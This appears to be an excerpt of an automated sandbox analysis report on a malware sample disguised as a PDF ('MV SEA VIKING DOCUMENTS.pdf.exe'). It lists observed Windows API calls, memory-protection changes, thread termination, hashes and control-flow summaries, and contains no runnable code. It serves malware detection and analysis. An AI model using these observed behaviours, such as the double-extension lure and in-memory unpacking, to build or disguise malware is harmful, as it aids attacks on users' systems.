                                                                                                                                                                                                                                • Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                                                                                                                                                                                                • Instruction ID: b7f7aa27055ddc775a1b47344aef2f77b81fec2ea34db2f3ccdabfa21b6bce3d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BF0F631810E1296DB317B548C44E7B97BCEB64354B04843BD741B71C0D3BC8D808BDA
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                                                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                                • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 71491171
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 714911E3
                                                                                                                                                                                                                                • GlobalFree.KERNEL32 ref: 7149124A
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 7149129B
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 714912B1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                                                                                                                • Opcode ID: 50c4ccdc4140c5f6d7a5b26d2165bdd540325eb5b665ba41086a58f852f23abd
                                                                                                                                                                                                                                • Instruction ID: 456f883afe7f69dfd2a5da1075ef38cdd415f972fe955f6db4a924ff4d076e8c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50c4ccdc4140c5f6d7a5b26d2165bdd540325eb5b665ba41086a58f852f23abd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB519DF6904202DFE701DF6AC944A257FB8FB68B25B24415AF946FB250E730E911CB98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll), ref: 00402695
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp$C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll
                                                                                                                                                                                                                                • API String ID: 1659193697-4249849587
                                                                                                                                                                                                                                • Opcode ID: ce5005d06b1fe62c951d2c108b7deea1323e23eaef29f3c489712312079c6529
                                                                                                                                                                                                                                • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce5005d06b1fe62c951d2c108b7deea1323e23eaef29f3c489712312079c6529
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                                                                                                                                • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405542
                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                                                                                                                                                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                                                                                                                                • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll), ref: 0040645C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                                • String ID: Call
                                                                                                                                                                                                                                • API String ID: 3356406503-1824292864
                                                                                                                                                                                                                                • Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                                                                                                                                                                • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,76F73420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 1100898210-3355392842
                                                                                                                                                                                                                                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                                                                • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                                                                                                                                                                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,80000000,00000003), ref: 00405E6E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                                • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                                                                                                                                                                • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                                                • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:0.1%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                Total number of Nodes:16
                                                                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                                                                execution_graph 67010 1f212b20 67012 1f212b2a 67010->67012 67013 1f212b3f LdrInitializeThunk 67012->67013 67014 1f212b31 67012->67014 67015 1671528 67016 1671554 67015->67016 67017 1671573 NtProtectVirtualMemory 67016->67017 67018 167156a Sleep 67016->67018 67020 1671604 67017->67020 67018->67017 67024 1f2129f0 LdrInitializeThunk 67025 16713f4 67026 167142c NtProtectVirtualMemory 67025->67026 67027 16714c1 67026->67027 67031 167100a 67032 1671045 TerminateThread 67031->67032 67033 1671089 67032->67033

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                • Opcode ID: 013313a600c7594047a81d687323772962f5fced72aae4c5821c2cf1805eeeba
                                                                                                                                                                                                                                • Instruction ID: 7ddc91e2501288f1d97323c8eac7a9184fffab3728ce8d3965d87e4a085cae28
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 013313a600c7594047a81d687323772962f5fced72aae4c5821c2cf1805eeeba
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9101C0F0900301AFE7094E25CC9CB59B7A2AF1A371F5A818ADC534B0A2E7B4C9C1CF11
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                control_flow_graph 63 167134e-16713a9 65 16713af-16713b2 63->65 66 16714ca-1671509 63->66 65->66 67 16713b8-16713cd call 167125b call 16712d1 65->67 67->66 72 16713d3-16713d6 67->72 72->66 73 16713dc-16714c7 NtProtectVirtualMemory 72->73
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 01671463
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                • Opcode ID: dd6cd841c0e6efaa7b7549ff7228ffee915e4f676a6050f057edf7c7e41dd1e5
                                                                                                                                                                                                                                • Instruction ID: 4e85b24d1a7cf07d654e0997caf5d1f94ffda8fc04ce778e08c5d7d29c3971c5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd6cd841c0e6efaa7b7549ff7228ffee915e4f676a6050f057edf7c7e41dd1e5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 622172B11113025FD7208E78CD91B663BAAEF67724F604269DC46DB296E364C4815511
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                control_flow_graph 76 1671360-16713a9 78 16713af-16713b2 76->78 79 16714ca-1671509 76->79 78->79 80 16713b8-16713cd call 167125b call 16712d1 78->80 80->79 85 16713d3-16713d6 80->85 85->79 86 16713dc-16714c7 NtProtectVirtualMemory 85->86
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 01671463
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                • Opcode ID: be204c76b4db8741d6422613f43df7de421dca8cb70cc583f44711fce12746dd
                                                                                                                                                                                                                                • Instruction ID: f90827eb730dbfc6fd3bfb9a4e08251e34e4514b0265ab16f0449c5c78a5f0f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be204c76b4db8741d6422613f43df7de421dca8cb70cc583f44711fce12746dd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F21AEE20853D65AC70186A85D4BF677EF99F93A48F2802CEDC85AB19BD31B9042D730
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 89 1671342-16713a9 92 16713af-16713b2 89->92 93 16714ca-1671509 89->93 92->93 94 16713b8-16713cd call 167125b call 16712d1 92->94 94->93 99 16713d3-16713d6 94->99 99->93 100 16713dc-16714c7 NtProtectVirtualMemory 99->100
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 01671463
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                • Opcode ID: 11885116ce108d9d86a7298ba08e4e584bb8b2dfc453a4cac440cfb433882562
                                                                                                                                                                                                                                • Instruction ID: bb1ac8a828f9641aa6ac289f6c31bba43a5f0348fef716e1d5d9d79498fdf5f5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11885116ce108d9d86a7298ba08e4e584bb8b2dfc453a4cac440cfb433882562
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4117B711023119FDB108F74CD91BA63BAEEF26710F65425ADC8ADB262D724C4818A24
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 103 16713f4-1671483 NtProtectVirtualMemory 105 16714c1-16714c7 103->105
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 01671463
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                • Opcode ID: c0c9da6a27d455730096ff43a6d9bca2c85dab4ec51787f65f994161bf0851f8
                                                                                                                                                                                                                                • Instruction ID: c6ec753fbd41e9a02c5861ec210348ec2cd530b53896f02b73ac2d073c13da1e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0c9da6a27d455730096ff43a6d9bca2c85dab4ec51787f65f994161bf0851f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D41103D20C53D619C30186A8694FF5BBEF95D97D9CB6843DEAC856B18BC71B9002D330
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 106 1671598-16715fc NtProtectVirtualMemory 107 1671604-167160b 106->107 108 16715ff call 16712d1 106->108 109 1671612 107->109 108->107 109->109
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 016715FC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                • Opcode ID: fc1674cc6941efff55b23bd640f53b1173147ff51fe10a9d13cf4edadd2cbf81
                                                                                                                                                                                                                                • Instruction ID: aff41bdb37d7bbb3e61a11a9722b56106410d6a95f310d6dfb713c82543565dc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc1674cc6941efff55b23bd640f53b1173147ff51fe10a9d13cf4edadd2cbf81
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B0171E24C93C566D30686A9580FF2BFFF45D43DACB2942CEAC911A497D35B5442DB30
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 110 1671575-167160b NtProtectVirtualMemory call 16712d1 115 1671612 110->115 115->115
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 016715FC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                • Opcode ID: ca74ddae958f91d72efb1064280140d442eb631729c6ed3febfba71115f2d3aa
                                                                                                                                                                                                                                • Instruction ID: cd787626a645a08a8c96a4aec82eb52d8c4b04964eeaa2c267f5495df4587f99
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca74ddae958f91d72efb1064280140d442eb631729c6ed3febfba71115f2d3aa
